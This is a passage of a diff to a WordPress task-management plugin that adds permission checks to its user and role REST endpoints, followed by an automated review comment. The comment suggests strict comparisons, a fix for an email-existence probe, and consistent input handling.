+ return $permissionCheck;
+ }
global $wpdb;
$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
$rolesTable = LAZYTASK_TABLE_PREFIX . 'roles';
@@ -1165,6 +1208,12 @@
}
public function updateRolePermissions(WP_REST_Request $request) {
+
+ $permissionCheck = $this->permission_check( $request, ['manage-rolls-permissions'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
+
global $wpdb;
$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
@@ -1250,6 +1299,10 @@
}
public function signUp(WP_REST_Request $request) {
+ $permissionCheck = $this->permission_check( $request, ['add-member-to-project-send-invite', 'manage-users'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
global $wpdb;
$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
$response = array();
@@ -1345,105 +1398,134 @@
if(!$id){
return array('status'=> 500, 'message' => 'User ID is required', 'data'=>[]);
}
- $username = sanitize_text_field($parameters['email']);
- $firstName = sanitize_text_field($parameters['firstName']);
- $lastName = sanitize_text_field($parameters['lastName']);
- $phoneNumber = sanitize_text_field($parameters['phoneNumber']);
- $roles = isset($parameters['roles']) && $parameters['roles']!='' ? json_decode($parameters['roles'], true) : [];
- $email = sanitize_text_field($parameters['email']);
+ //check id and getCurrentUserId match or logged in user is admin or super admin
+ $getCurrentUserResponse = $this->lazytask_get_current_logged_user($request);
+ if (is_wp_error($getCurrentUserResponse)) {
+ return $getCurrentUserResponse;
+ }
+
+ $statusCode = $getCurrentUserResponse->get_status();
+ if($statusCode != 200){
+ return new WP_REST_Response(['status'=>$statusCode, 'message'=>'Unauthorized', 'data'=>[]], $statusCode);
+ }
+
+ $getCurrentUser = $getCurrentUserResponse->get_data();
+ if( ( isset($getCurrentUser['data']['id']) && $id == $getCurrentUser['data']['id'] ) || ( in_array('administrator', $getCurrentUser['data']['roles']) || in_array('manage-users', $getCurrentUser['data']['llc_permissions']) ) ){
+ $username = isset($parameters['email']) ? sanitize_text_field($parameters['email']) : '';
+ $firstName = sanitize_text_field($parameters['firstName']);
+ $lastName = sanitize_text_field($parameters['lastName']);
+ $phoneNumber = sanitize_text_field($parameters['phoneNumber']);
+ $roles = isset($parameters['roles']) && $parameters['roles']!='' ? json_decode($parameters['roles'], true) : [];
+
+ $email = sanitize_text_field($parameters['email']);
// $password = isset($parameters['password']) && $parameters['password']!=''? sanitize_text_field($parameters['password']): '123456';
- // $role = sanitize_text_field($parameters['role']);
- $error = new WP_Error();
- if (empty($username)) {
- $error->add(400, __("Username field 'username' is required.", 'lazytasks-project-task-management'), array('status' => 400));
- return $error;
- }
- if (empty($email)) {
- $error->add(401, __("Email field 'email' is required.", 'lazytasks-project-task-management'), array('status' => 400));
- return $error;
- }
+ // $role = sanitize_text_field($parameters['role']);
+ $error = new WP_Error();
+ if (empty($username)) {
+ $error->add(400, __("Username field 'username' is required.", 'lazytasks-project-task-management'), array('status' => 400));
+ return $error;
+ }
+ if (empty($email)) {
+ $error->add(401, __("Email field 'email' is required.", 'lazytasks-project-task-management'), array('status' => 400));
+ return $error;
+ }
- $nickname= '';
- if($firstName){
- $nickname .= strtolower($firstName);
- }
- if($lastName){
- $nickname .= '-';
- $nickname .= strtolower($lastName);
- }
- $user_id = username_exists($username);
- $userIdByEmail = email_exists($email);
+ $nickname= '';
+ if($firstName){
+ $nickname .= strtolower($firstName);
+ }
+ if($lastName){
+ $nickname .= '-';
+ $nickname .= strtolower($lastName);
+ }
+ $user_id = username_exists($username);
+ $userIdByEmail = email_exists($email);
- if ((!$user_id || $user_id==$id) && (!$userIdByEmail || $userIdByEmail==$id)) {
- $db->query('START TRANSACTION');
+ if ((!$user_id || $user_id==$id) && (!$userIdByEmail || $userIdByEmail==$id)) {
+ $db->query('START TRANSACTION');
- $args = array (
- 'ID' => (int)$id,
- 'user_login' => $username,
- 'user_email' => $email,
- 'user_nicename' => $nickname,
- 'display_name' => $firstName . ' ' . $lastName,
- );
- $userId = wp_update_user($args);
+ $args = array (
+ 'ID' => (int)$id,
+ /*'user_login' => $username,
+ 'user_email' => $email,*/
+ 'user_nicename' => $nickname,
+ 'display_name' => $firstName . ' ' . $lastName,
+ );
+ if ( in_array('administrator', $getCurrentUser['data']['roles']) || in_array('manage-users', $getCurrentUser['data']['llc_permissions']) ){
+ $args['user_login'] = $username;
+ $args['user_email'] = $email;
+ }
+ $userId = wp_update_user($args);
- if (!is_wp_error($userId)) {
- $user = get_user_by('ID', $userId);
+ if (!is_wp_error($userId)) {
+// $user = get_user_by('ID', $userId);
- update_user_meta($userId, 'first_name', $firstName);
- update_user_meta($userId, 'last_name', $lastName);
+ update_user_meta($userId, 'first_name', $firstName);
+ update_user_meta($userId, 'last_name', $lastName);
- update_user_meta($userId, 'phone_number', $phoneNumber);
- if($roles){
- update_user_meta($userId, 'lazytasks_capabilities', $roles);
+ update_user_meta($userId, 'phone_number', $phoneNumber);
+ if($roles && ( in_array('administrator', $getCurrentUser['data']['roles']) || in_array('manage-users', $getCurrentUser['data']['llc_permissions']) )){
+ update_user_meta($userId, 'lazytasks_capabilities', $roles);
- $this->addUserRole($userId, $roles);
- }
+ $this->addUserRole($userId, $roles);
+ }
- // Handle file upload
- $requestFile = $request->get_file_params();
- if (isset($requestFile['file']) && $requestFile['file']) {
- require_once(ABSPATH . 'wp-admin/includes/file.php');
- $uploadedfile = $requestFile['file'];
- $upload_overrides = array('test_form' => false);
-
- $moveFile = wp_handle_upload($uploadedfile, $upload_overrides);
-
- if($moveFile){
- $attachment = array(
- 'post_author' => $userId,
- 'post_title' => $uploadedfile['name'],
- 'post_content' => '',
- 'post_status' => 'inherit',
- 'post_mime_type' => image_type_to_mime_type(exif_imagetype($moveFile['file']))
- );
-
- $attachment_id = wp_insert_attachment($attachment, $moveFile['file']);
-
- require_once(ABSPATH . 'wp-admin/includes/image.php');
- $attach_data = wp_generate_attachment_metadata($attachment_id, $moveFile['file']);
- wp_update_attachment_metadata($attachment_id, $attach_data);
+ // Handle file upload
+ $requestFile = $request->get_file_params();
+ if (isset($requestFile['file']) && $requestFile['file']) {
+ require_once(ABSPATH . 'wp-admin/includes/file.php');
+ $uploadedfile = $requestFile['file'];
+ $upload_overrides = array('test_form' => false);
+
+ $moveFile = wp_handle_upload($uploadedfile, $upload_overrides);
+
+ if($moveFile){
+ $attachment = array(
+ 'post_author' => $userId,
+ 'post_title' => $uploadedfile['name'],
+ 'post_content' => '',
+ 'post_status' => 'inherit',
+ 'post_mime_type' => image_type_to_mime_type(exif_imagetype($moveFile['file']))
+ );
+
+ $attachment_id = wp_insert_attachment($attachment, $moveFile['file']);
+
+ require_once(ABSPATH . 'wp-admin/includes/image.php');
+ $attach_data = wp_generate_attachment_metadata($attachment_id, $moveFile['file']);
+ wp_update_attachment_metadata($attachment_id, $attach_data);
- update_user_meta($userId, 'profile_photo', $moveFile['url']);
- update_user_meta($userId, 'profile_photo_id', $attachment_id);
+ update_user_meta($userId, 'profile_photo', $moveFile['url']);
+ update_user_meta($userId, 'profile_photo_id', $attachment_id);
+ }
}
- }
- $db->query('COMMIT');
+ $db->query('COMMIT');
- $user = $this->getUserById($id);
+ $user = $this->getUserById($id);
if($user && sizeof($user)>0){
return new WP_REST_Response(['status'=>200, 'message'=>'Update has been Successfully', 'data'=>$user]);
}
return new WP_REST_Response(['status'=>404, 'message'=>__("User not found", "lazytasks-project-task-management")]);
}
+
+ return new WP_REST_Response(['status'=>500, 'message'=>__("User Update Failed", "lazytasks-project-task-management")]);
+
}
- return new WP_REST_Response(['status'=>500, 'message'=>__("User Update Failed", "lazytasks-project-task-management")]);
+ //username or email already exists
+ return new WP_REST_Response(['status'=>409, 'message'=>__("User already exists", "lazytasks-project-task-management")]);
+ }
+ return new WP_REST_Response(['status'=>403, 'message'=>'Unauthorized', 'data'=>[]], 403);
+
}
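Review bot: The self-or-admin check at L1233 compares the request's `$id` to the token's user id with `==` and tests roles and permissions with non-strict `in_array`; use `(int) $id === (int) $getCurrentUser['data']['id']` and pass `true` as the third argument to each `in_array` (also at L1301 and L1318), and compute that admin/manage-users condition once as a `$canManageUsers` boolean instead of spelling it out three times. For a non-admin self-update the submitted email and username are never written (L1296-L1304), yet `username_exists()`/`email_exists()` at L1280-L1281 still run against them and answer 409 "User already exists" (L1392), which both blocks a legitimate profile edit and lets any logged-in user probe whether an address is registered; in that branch take `$username`/`$email` from the current user, or run the uniqueness check only when `$canManageUsers`. `$firstName`, `$lastName`, `$phoneNumber` and `$email` (L1235-L1240) are read without `isset` while `$username` now is (L1234), so a missing key raises an undefined-index warning; `$parameters['firstName'] ?? ''` keeps them consistent. The final response at L1394 pairs status 403 with the text `Unauthorized`, which is the 401 wording; `Forbidden` matches the code.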
public function userRoleUpdate(WP_REST_Request $request) {
+ $permissionCheck = $this->permission_check( $request, ['manage-rolls-permissions'] );
+ if ( is_wp_error( $permissionCheck )